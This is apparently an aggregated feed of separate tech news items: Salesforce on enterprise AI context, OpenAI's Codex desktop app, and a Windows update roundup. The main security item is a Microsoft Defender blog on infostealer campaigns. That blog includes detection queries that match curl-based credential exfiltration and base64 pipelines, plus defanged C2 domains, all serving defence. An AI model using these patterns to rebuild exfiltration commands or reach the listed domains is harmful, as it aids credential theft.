AI is ubiquitous in both the consumer and enterprise sectors. Yet few organizations are realizing AI’s full potential. Why? AI agents must make decisions and take actions based on a limited subset of overall data. Result: too much guesswork, the occasional hallucination, and failure to extract full value from AI.
The downfall of enterprise AI, then, is agents that falter without a comprehensive understanding of data, both customer- and business-derived. Companies need to be able to pivot from simple data ingestion to sophisticated content collection, integration, and curation that enable AI agents to respond accurately and take appropriate actions.
This can only be accomplished by advancing from traditional prompt engineering to context engineering, which combines a 360-degree view of the customer and a complete enterprise view of a dynamically changing business.
Why enterprise AI is data-rich but context-poor
Many companies implementing AI are data-rich. They use large language models (LLMs) that pull data from all over the internet. They have in-house models that access data from customer databases and product documentation libraries.
Their agents access these pools of information and attempt to guide their decisions. Sometimes they get it right. But too often, they take the wrong action or recommend an incorrect response. What is missing is end-to-end context.
Here is a common example: A person wants to buy a car, so before finalizing their purchase, they go on the manufacturer’s website to research the various options. This data is captured in the car maker’s systems, and over the following weeks, AI directs a series of marketing actions to generate interest in the car model. Without full context, the marketing agent doesn’t recognize that the person has already purchased the car.
This breakdown occurs when one system contains the details of a car purchase, another has records on the individual buyer, and a separate application tracks customer engagement details (such as website visits). Robbed of the rich context of data locked inside information silos, AI digital engagement agents only know that someone researched a car. They’ve missed the opportunity to promote extended warranties and maintenance plans.
Far from rare, such examples are all too common in agentic AI. Enterprises may be data-rich but are context-poor.
Key elements for achieving fluid, unified data
For AI to respond contextually, data needs to be fluid, harmonized, and unified. The walls between silos must be removed.
Achieving this requires several key elements:
Data catalog: The data catalog provides a single view of data across systems. This gives apps and AI agents a map of all assets residing in on-premises systems, the cloud, data lakes, and legacy infrastructure.
Data lineage: Consider this a data verification layer. It traces the full journey of data from origin to consumption, showing every change or transformation along the way. Data lineage enables AI agents to know where any piece of data came from, how it was produced, whether it aligns with organizational governance and regulatory compliance policies, whether it is secure and trustworthy, and whether it reflects the most current knowledge.
Connected signals and actions: Apps and AI agents rely on signals from every system to interpret what’s happening and trigger secure, meaningful actions.
Unified data context: There must be a central repository within an agentic AI architecture that collects, synthesizes, harmonizes, and unifies all information. This context interface for apps and AI agents must operate in real time without requiring file copying or data movement. Whether an AI agent is analyzing a trend or processing a product return, it must provide a single, shared, up-to-the-second view of the customer and the business, aligned with all relevant policies.
Enterprise understanding: Apps and AI agents should not have to relearn the business from scratch. They must act in accordance with the definitions, rules, and principles that underlie each portion of the business. If they don’t, they may appear “AI smart” but “corporate stupid.” Why? Deep metadata intelligence in the enterprise is unavailable to customer-facing systems.
Building enterprise understanding for smarter AI
Enterprise context is vital in defining core business entities and their interrelationships. This context encompasses historical records, master data management (of products, suppliers, assets, and more), business rules, regulatory compliance, and organizational workflows. Comprehensive customer and enterprise records must be unified to supply AI agents with a shared data vocabulary that helps them infer the right context for the right situation at the right time.
Case in point: Large enterprises typically include numerous accounts and corporate entities. The names of various entities may be similar, but there are hierarchies, as well as specific rules and tax schemes that apply by geography and industry. In such a complex organizational structure, if names are entered incorrectly or data is assigned to the wrong corporate entity, AI-based errors are practically inevitable.
Why complete context is key to preventing AI errors
Only the complete unification of customer and enterprise metadata and systems can prevent costly errors and keep AI agents and apps supplied with the applicable context. This way, organizations can consolidate all enterprise and customer data and connect related data from multiple sources to transform trusted context into a meaningful story.
Learn more about Data 360 from Salesforce and how it transforms scattered, fragmented enterprise data into one complete view of your business to fuel real-time workflows, better decision making, and more intelligent agents.
OpenAI is betting that coding agents are outgrowing the terminal.
The company launched a macOS desktop app on Monday for its Codex software development agent, which focuses less on the code itself and more on managing multiple software development agents in parallel.
Until now, the main way to interact with Codex was through the terminal, similar to Anthropic’s Claude Code or Google’s Gemini CLI. While the new desktop app still allows developers to drop into an IDE like VS Code or the terminal for hands-on work, OpenAI’s mission with this app is to make agentic coding more accessible to a wider range of users — even those who may never want to touch the code itself.
As OpenAI CEO Sam Altman pointed out during a press briefing ahead of Monday’s launch, over the last few months, software agents have “crossed a threshold of real utility.”
More than a million people already use Codex regularly, he said, but because these agents are now so capable, the team also wanted to look into ways to make them more accessible to a wider audience.
Credit: OpenAI.
“5.2 [Codex] in particular is a model that many of us have found can do extremely complex things. We realized we started to feel limited by the interface. And so as we have gotten to these incredible reasoning models with this incredible capability, and we’ve been thinking about what we need to do to make it easy for people to get use of that capability. We have made this Codex app, which is a way to work with the model and manage agents as they do these like long-horizon tasks running on your laptop,” Altman explains.
The Codex team also argues that as developers begin trusting their agents with more complex work, an app like Codex is necessary to help them orchestrate and supervise them.
“Existing IDEs and terminal-based tools are not built to support this way of working,” OpenAI argues in its announcement.
Usking skills in the Codex desktop app (credit: OpenAI).
Developers can point the Codex app at existing repositories, and it integrates directly with GitHub for creating pull requests. Multiple agents can run in parallel, and developers can switch back and forth between different tasks just like they would switch between files in an IDE, because the agents all run in separate threads.
Since Codex supports Git worktrees, multiple agents can work on the same repo in parallel, each using an isolated copy of that code.
Credit: OpenAI.
From vibe coding to software engineering
As Altman noted, one question the company has been asking itself is whether these agents can transition from vibe coding to serious software engineering. Altman believes so.
“I think we’re over the bar for that,” he says. “I think this will be the way that most serious coders do their job in very rapidly from now.”
Codex beyond code
One interesting aspect of Codex is that it isn’t just about writing code. As Anthropic quickly realized with Claude Code, the core agentic loop that powers these tools is also useful for automating other kinds of workflows. Anthropic launched Cowork as a separate app for this use case, but OpenAI notes that Codex users can use Agent Skills to extend Codex to do this.
With skills, users can “extend Codex beyond code generation to tasks that require gathering and synthesizing information, problem-solving, writing, and more,” the team writes.
That’s not something OpenAI is emphasizing in this release, but given that the company has set its sights on enterprise use cases, we’ll likely hear much more about this in the future.
Availability
Codex is now available to anyone with a ChatGPT account, including, for a limited time, ChatGPT free and Go users. For those on paid ChatGPT Plus, Pro, Business, Enterprise, and Edu plans, OpenAI is doubling the rate limits during this time.
The merger creates the world's most valuable private company, and paves the way for Musk to try and prove out the usefulness of space-based data centers.
Infostealer threats are rapidly expanding beyond traditional Windows-focused campaigns, increasingly targeting macOS environments, leveraging cross-platform languages such as Python, and abusing trusted platforms and utilities to silently deliver credential-stealing malware at scale. Since late 2025, Microsoft Defender Experts has observed macOS targeted infostealer campaigns using social engineering techniques—including ClickFix-style prompts and malicious DMG installers—to deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS).
These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials, session data, secrets from browsers, keychains, and developer environments. Simultaneously, Python-based stealers are being leveraged by attackers to rapidly adapt, reuse code, and target heterogeneous environments with minimal overhead. Other threat actors are abusing trusted platforms and utilities—including WhatsApp and PDF converter tools—to distribute malware like Eternidade Stealer and gain access to financial and cryptocurrency accounts.
This blog examines how modern infostealers operate across operating systems and delivery channels by blending into legitimate ecosystems and evading conventional defenses. We provide comprehensive detection coverage through Microsoft Defender XDR and actionable guidance to help organizations detect, mitigate, and respond to these evolving threats.
Activity overview
macOS users are being targeted through fake software and browser tricks
Mac users are encountering deceptive websites—often through Google Ads or malicious advertisements—that either prompt them to download fake applications or instruct them to copy and paste commands into their Terminal. These “ClickFix” style attacks trick users into downloading malware that steals browser passwords, cryptocurrency wallets, cloud credentials, and developer access keys.
Three major Mac-focused stealer campaigns include DigitStealer (distributed through fake DynamicLake software), MacSync (delivered via copy-paste Terminal commands), and Atomic Stealer (using fake AI tool installers). All three harvest the same types of data—browser credentials, saved passwords, cryptocurrency wallet information, and developer secrets—then send everything to attacker servers before deleting traces of the infection.
Stolen credentials enable account takeovers across banking, email, social media, and corporate cloud services. Cryptocurrency wallet theft can result in immediate financial loss. For businesses, compromised developer credentials can provide attackers with access to source code, cloud infrastructure, and customer data.
Phishing campaigns are delivering Python-based stealers to organizations
The proliferation of Python information stealers has become an escalating concern. This gravitation towards Python is driven by ease of use and the availability of tools and frameworks allowing quick development, even for individuals with limited coding knowledge. Due to this, Microsoft Defender Experts observed multiple Python-based infostealer campaigns over the past year. They are typically distributed via phishing emails and collect login credentials, session cookies, authentication tokens, credit card numbers, and crypto wallet data.
PXA Stealer, one of the most notable Python-based infostealers seen in 2025, harvests sensitive data including login credentials, financial information, and browser data. Linked to Vietnamese-speaking threat actors, it targets government and education entities through phishing campaigns. In October 2025 and December 2025, Microsoft Defender Experts investigated two PXA Stealer campaigns that used phishing emails for initial access, established persistence via registry Run keys or scheduled tasks, downloaded payloads from remote locations, collected sensitive information, and exfiltrated the data via Telegram. To evade detection, we observed the use of legitimate services such as Telegram for command-and-control communications, obfuscated Python scripts, malicious DLLs being sideloaded, Python interpreter masquerading as a system process (i.e., svchost.exe), and the use of signed and living off the land binaries.
Due to the growing threat of Python-based infostealers, it is important that organizations protect their environment by being aware of the tactics, techniques, and procedures used by the threat actors who deploy this type of malware. Being compromised by infostealers can lead to data breaches, unauthorized access to internal systems, business email compromise (BEC), supply chain attacks, and ransomware attacks.
Attackers are weaponizing WhatsApp and PDF tools to spread infostealers
Since late 2025, platform abuse has become an increasingly prevalent tactic wherein adversaries deliberately exploit the legitimacy, scale, and user trust associated with widely used applications and services.
WhatsApp Abused to Deliver Eternidade Stealer: During November 2025, Microsoft Defender Experts identified a WhatsApp platform abuse campaign leveraging multi-stage infection and worm-like propagation to distribute malware. The activity begins with an obfuscated Visual Basic script that drops a malicious batch file launching PowerShell instances to download payloads.
One of the payloads is a Python script that establishes communication with a remote server and leverages WPPConnect to automate message sending from hijacked WhatsApp accounts, harvests the victim’s contact list, and sends malicious attachments to all contacts using predefined messaging templates. Another payload is a malicious MSI installer that ultimately delivers Eternidade Stealer, a Delphi-based credential stealer that continuously monitors active windows and running processes for strings associated with banking portals, payment services, and cryptocurrency exchanges including Bradesco, BTG Pactual, MercadoPago, Stripe, Binance, Coinbase, MetaMask, and Trust Wallet.
Malicious Crystal PDF installer campaign: In September 2025, Microsoft Defender Experts discovered a malicious campaign centered on an application masquerading as a PDF editor named Crystal PDF. The campaign leveraged malvertising and SEO poisoning through Google Ads to lure users. When executed, CrystalPDF.exe establishes persistence via scheduled tasks and functions as an information stealer, covertly hijacking Firefox and Chrome browsers to access sensitive files in AppData\Roaming, including cookies, session data, and credential caches.
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of the macOS‑focused, Python‑based, and platform‑abuse infostealer threats discussed in this report. These recommendations draw from established Defender blog guidance patterns and align with protections offered across Microsoft Defender XDR.
Organizations can follow these recommendations to mitigate threats associated with this threat:
Strengthen user awareness & execution safeguards
Educate users on social‑engineering lures, including malvertising redirect chains, fake installers, and ClickFix‑style copy‑paste prompts common across macOS stealer campaigns such as DigitStealer, MacSync, and AMOS.
Discourage installation of unsigned DMGs or unofficial “terminal‑fix” utilities; reinforce safe‑download practices for consumer and enterprise macOS systems.
Harden macOS environments against native tool abuse
Monitor for suspicious Terminal activity—especially execution flows involving curl, Base64 decoding, gunzip, osascript, or JXA invocation, which appear across all three macOS stealers.
Detect patterns of fileless execution, such as in‑memory pipelines using curl | base64 -d | gunzip, or AppleScript‑driven system discovery and credential harvesting.
Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data.
Control outbound traffic & staging behavior
Inspect network egress for POST requests to newly registered or suspicious domains—a key indicator for DigitStealer, MacSync, AMOS, and Python‑based stealer campaigns.
Detect transient creation of ZIP archives under /tmp or similar ephemeral directories, followed by outbound exfiltration attempts.
Block direct access to known C2 infrastructure where possible, informed by your organization’s threat‑intelligence sources.
Protect against Python-based stealers & cross-platform payloads
Harden endpoint defenses around LOLBIN abuse, such as certutil.exe decoding malicious payloads.
Evaluate activity involving AutoIt and process hollowing, common in platform‑abuse campaigns.
Microsoft also recommends the following mitigations to reduce the impact of this threat:
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Enable network protection and web protection in Microsoft Defender for Endpoint to safeguard against malicious sites and internet-based threats.
Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Allow investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to prevent attackers from using local administrator privileges to set antivirus exclusions.
Microsoft Defender XDR customers can also implement the following attack surface reduction rules to harden an environment against LOLBAS techniques used by threat actors:
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic
Observed activity
Microsoft Defender coverage
Execution
Encoded powershell commands downloading payload Execution of various commands and scripts via osascript and sh
Microsoft Defender for Endpoint Suspicious Powershell download or encoded command execution Suspicious shell command execution Suspicious AppleScript activity Suspicious script launched
Persistence
Registry Run key created Scheduled task created for recurring execution LaunchAgent or LaunchDaemon for recurring execution
Microsoft Defender for Endpoint Anomaly detected in ASEP registry Suspicious Scheduled Task Launched Suspicious Pslist modifications Suspicious launchctl tool activity
Microsoft Defender Antivirus Trojan:AtomicSteal.F
Defense Evasion
Unauthorized code execution facilitated by DLL sideloading and process injection Renamed Python interpreter executes obfuscated Python script Decode payload with certutil Renamed AutoIT interpreter binary and AutoIT script Delete data staging directories
Microsoft Defender for Endpoint An executable file loaded an unexpected DLL file A process was injected with potentially malicious code Suspicious Python binary execution Suspicious certutil activity Obfuse’ malware was prevented Rename AutoIT tool Suspicious path deletion
Microsoft Defender Antivirus Trojan:Script/Obfuse!MSR
Credential Access
Credential and Secret Harvesting Cryptocurrency probing
Microsoft Defender for Endpoint Possible theft of passwords and other sensitive web browser information Suspicious access of sensitive files Suspicious process collected data from local system Unix credentials were illegitimately accessed
Discovery
System information queried using WMI and Python
Microsoft Defender for Endpoint Suspicious System Hardware Discovery Suspicious Process Discovery Suspicious Security Software Discovery Suspicious Peripheral Device Discovery
Command and Control
Communication to command and control server
Microsoft Defender for Endpoint Suspicious connection to remote service
Collection
Sensitive browser information compressed into ZIP file for exfiltration
Microsoft Defender for Endpoint Compression of sensitive data Suspicious Staging of Data Suspicious archive creation
Exfiltration
Exfiltration through curl
Microsoft Defender for Endpoint Suspicious file or content ingress Remote exfiltration activity Network connection by osascript
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Defender XDR customers can run the following queries to find related activity in their networks:
Use the following queries to identify activity related to DigitStealer
// Identify suspicious DynamicLake disk image (.dmg) mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev' , '-o quarantine')
| where ProcessCommandLine contains '/Volumes/Install DynamicLake'
// Identify data exfiltration to DigitStealer C2 API endpoints.
DeviceProcessEvents
| where InitiatingProcessFileName has_any ('bash', 'sh')
| where ProcessCommandLine has_all ('curl', '--retry 10')
| where ProcessCommandLine contains 'hwid='
| where ProcessCommandLine endswith "api/credentials"
or ProcessCommandLine endswith "api/grabber"
or ProcessCommandLine endswith "api/log"
| extend APIEndpoint = extract(@"/api/([^\s]+)", 1, ProcessCommandLine)
Use the following queries to identify activity related to MacSync
// Identify exfiltration of staged data via curl
DeviceProcessEvents
| where InitiatingProcessFileName =~ "zsh" and FileName =~ "curl"
| where ProcessCommandLine has_all ("curl -k -X POST -H", "api-key: ", "--max-time", "-F file=@/tmp/", ".zip", "-F buildtxd=")
Use the following queries to identify activity related to Atomic Stealer (AMOS)
// Identify suspicious AlliAi disk image (.dmg) mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev', '-o quarantine')
| where ProcessCommandLine contains '/Volumes/ALLI'
Use the following queries to identify activity related to PXA Stealer: Campaign 1
// Identify activity initiated by renamed python binary
DeviceProcessEvents
| where InitiatingProcessFileName endswith "svchost.exe"
| where InitiatingProcessVersionInfoOriginalFileName == "pythonw.exe"
// Identify network connections initiated by renamed python binary
DeviceNetworkEvents
| where InitiatingProcessFileName endswith "svchost.exe"
| where InitiatingProcessVersionInfoOriginalFileName == "pythonw.exe"
Use the following queries to identify activity related to PXA Stealer: Campaign 2
// Identify malicious Process Execution activity
DeviceProcessEvents
| where ProcessCommandLine has_all ("-y","x",@"C:","Users","Public", ".pdf") and ProcessCommandLine has_any (".jpg",".png")
// Identify suspicious process injection activity
DeviceProcessEvents
| where FileName == "cvtres.exe"
| where InitiatingProcessFileName has "svchost.exe"
| where InitiatingProcessFolderPath !contains "system32"
Use the following queries to identify activity related to WhatsApp Abused to Deliver Eternidade Stealer
// Identify the files dropped from the malicious VBS execution
DeviceFileEvents
| where InitiatingProcessCommandLine has_all ("Downloads",".vbs")
| where FileName has_any (".zip",".lnk",".bat") and FolderPath has_all ("\\Temp\\")
// Identify batch script launching powershell instances to drop payloads
DeviceProcessEvents
| where InitiatingProcessParentFileName == "wscript.exe" and InitiatingProcessCommandLine has_any ("instalar.bat","python_install.bat")
| where ProcessCommandLine !has "conhost.exe"
// Identify AutoIT executable invoking malicious AutoIT script
DeviceProcessEvents
| where InitiatingProcessCommandLine has ".log" and InitiatingProcessVersionInfoOriginalFileName == "Autoit3.exe"
Use the following queries to identify activity related to Malicious CrystalPDF Installer Campaign
// Identify network connections to C2 domains
DeviceNetworkEvents
| where InitiatingProcessVersionInfoOriginalFileName == "CrystalPDF.exe"
// Identify scheduled task persistence
DeviceEvents
| where InitiatingProcessVersionInfoProductName == "CrystalPDF"
| where ActionType == "ScheduledTaskCreated
Deceptive domain that redirects user after CAPTCHA verification (AMOS campaign)
ai[.]foqguzz[.]com
Domain
Redirected domain used to deliver unsigned disk image. (AMOS campaign)
day.foqguzz[.]com
Domain
C2 server (AMOS campaign)
bagumedios[.]cloud
Domain
C2 server (PXA Stealer: Campaign 1)
Negmari[.]com Ramiort[.]com Strongdwn[.]com
Domain
C2 servers (Malicious Crystal PDF installer campaign)
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Jason Willems believes the tech monoculture is finally breaking, Don Ho shares some bad Notepad++ news, Tailscale’s Avery Pennarun pens a great downtime apology, Milan Milanović explains why you can only code 4 hours per day, and Addy Osmani on managing comprehension debt when leaning on AI to code.
Welcome to the January 2026 Windows news you can use, including new capabilities in Windows Backup for Organizations and Windows 365.
Coming up on February 5, there will be another Secure Boot AMA, so please tune in to get answers to your questions. Then, on Mondays in March, join us for deep dives, AMAs, and more at Microsoft Technical Takeoff for Windows and Microsoft Intune. Check out the full schedule and start adding sessions to your calendar. Now, let's get started with the latest news you can use.
New in Windows update and device management
[BACKUP] [RESTORE] – Windows Backup for Organizations is expanding to include a new restore experience at first sign-in. In early 2026, Windows 11 users will be able to restore their Windows settings and Microsoft Store app list at the very first sign-in. Even on Microsoft Entra hybrid join devices and multi-user setups.
[WINDOWS 365] – Windows 365 is now available in the Brazil South region. Your organization can now provision Cloud PCs closer to your users in Brazil and across South America, helping reduce latency and support regional data residency requirements.
[INTUNE] – Get insights from the experts by watching last week's Intune edition of Tech Community Live, now available on demand. Learn how to secure endpoints with policy and Microsoft Defender, manage apps, and apply Zero Trust best practices when managing devices in Intune.
New in Windows security
[NETWORK] [ACCESS] – Windows is moving toward a more secure authentication model by phasing out New Technology LAN Manager (NTLM) in favor of stronger, Kerberos‑based alternatives. Get familiar with the phased roadmap for NTLM disablement and tools that will help prepare your organization for this change.
[WINDOWS HELLO] – The January 2026 optional non-security update starts the gradual rollout of support for peripheral fingerprint sensors with Windows Hello Enhanced Sign-in Security (ESS).
[SECURE BOOT] – The Secure Boot playbook has been updated to make it easier to identify the steps and tools to help you proactively update Secure Boot certificates across your estate before they start expiring in June of 2026. Have questions? Post them now then tune in for the Secure Boot AMA on February 5, 2026 at 8:00 AM PT.
[SECURE BOOT] [INTUNE] – You can now deploy, manage, and monitor Secure Boot certificate updates using Microsoft Intune. Step-by-step guidance is now available and has been added to the Secure Boot playbook for easy reference. Additionally, a new Secure Boot status report is now available in Windows Autopatch.
[SECURE BOOT] [WINDOWS UPDATE] – Starting with the January 2026 security update, Windows quality updates include a subset of high confidence device targeting data that identifies devices eligible to automatically receive new Secure Boot certificates. Devices will receive the new certificates only after demonstrating sufficient successful update signals, ensuring a safe and phased deployment.
[DATA PROTECTION] – With the January 2026 optional non-security update, IT admins can now set how often Data Protection Application Programming Interface (DPAPI) domain backup keys rotate automatically. This strengthens cryptographic security and reduces reliance on older encryption algorithms.
[VIRTUALIZATION] [CLOUD PC] – A unified, policy-driven way to control which RDP Shortpath modes (Managed, Public/STUN, Public/TURN) are enabled across Azure Virtual Desktop session hosts and Windows 365 Cloud PCs is now available. Explore RDP Shortpath configuration via Group Policy or Microsoft Intune.
[M365] – Starting February 9, 2026, Microsoft will continue to ramp up enforcement, and users will be unable to sign in to the Microsoft 365 admin center without successfully completing multifactor authentication.
[WDS] – Starting with the January 2026 security update, you can explicitly disable WDS hands-free deployment with the help of new Event Log alerts and registry key options. In April 2026, hands-free deployment will be disabled by default. After that date, it will no longer work unless explicitly overridden with registry settings.
New in AI
[WINDOWS 365] – Windows 365 for Agents introduces a set of capabilities that make it possible to run autonomous AI agents securely on Cloud PCs. Enhancements will help you automate complex tasks, reduce idle costs, and ensure trust in autonomous operations.
To learn about latest capabilities for Copilot+ PCs, visit the Windows Roadmap and filter Platform by "Copilot+ PC Exclusives."
[START MENU] – The redesigned Start menu continues its gradual rollout to Windows devices. As the rollout progresses, more Windows devices will receive the redesigned Start menu experience.
New features and improvements are coming in the February 2026 security update. You can preview them by installing the January 2026 optional non-security update for Windows 11, version 25H2 and version 24H2. This update includes the gradual rollout of:
[MOBILE] – Cross‑Device Resume is expanding to include the ability to continue activities from your Android phone on your PC based on the apps and services you use, including resuming Spotify playback, working in Word, Excel, or PowerPoint, or continuing a browsing session.
[NARRATOR] – Narrator now gives you more control over how it announces on‑screen controls. You can choose which details are spoken and adjust their order to match how you navigate apps.
[VOICE ACCESS] – Voice Access setup has been streamlined to make it easier to get started. The redesigned experience helps you download a speech model for your chosen language, select your preferred input microphone, and learn what Voice Access can help you do on your Windows PC. You can also now adjust the amount of delay before a voice command runs.
[AUDIO] – Windows now offers enhanced support for MIDI 1.0 and MIDI 2.0, including full WinMM and WinRT MIDI 1.0 support with built-in translation, shared MIDI ports across apps, custom port names, loopback, and app-to-app MIDI.
[SETTINGS] – The Device card on the Settings home page appears when you sign in with your Microsoft account. It now shows key specifications and usage details for your PC.
[COPILOT+ PC] – The Settings Agent now supports more languages, with expanded support for German, Portuguese, Spanish, Korean, Japanese, Hindi, Italian, and Chinese (Simplified).
New for developers
[APPS] [TOOLS] – The Windows App Development CLI (winapp) is now available in public preview. It's a new open-source command-line tool designed to simplify the development lifecycle for Windows applications across a wide range of frameworks and toolchains.
[ACTIVE DIRECTORY] – Guidance is now available to help mitigate potential threats to Active Directory Domain Services, including authentication relay attacks, Kerberoasting, and unconstrained delegation.
[KERBEROS] – The first phase of protections designed to address a Kerberos information disclosure vulnerability are now available. They include new auditing and optional configuration controls that help reduce reliance on legacy encryption types such as RC4 and prepare domain controllers.
[REMINDER] – Starting with the January 2026 security update, Windows Server 2025 updates and release notes have their own KB identifiers and build numbers. These identifiers are separate from those for Windows 11, versions 24H2 and 25H2. This change improves clarity for administrators. Installation and management processes remain the same.
Out-of-band updates
Two out-of-band updates were released in January:
January 17, 2026 – Out-of-band update to address sign-in failures during Remote Desktop connections
January 24, 2026 – Out-of-band update to address cloud‑backed storage application issues
Looking for the latest news and previews for Windows, Copilot, Copilot+ PCs, the Windows and Windows Server Insider Programs, and more? Check out these resources:
Windows Roadmapfor new Copilot+ PCs and Windows features – filter by platform, version, status, and channel or search by feature name
If you are an IT admin with questions about managing and updating Windows, add our monthly Windows Office Hours to your calendar. We assemble a crew of Windows, Windows 365, security, and Intune experts to help answer your questions and provide tips on tools, best practices, and troubleshooting.
Finally, we are always looking to improve this monthly summary. Drop us a note in the Comments and let us know what we can do to make this more useful for you!
Log in
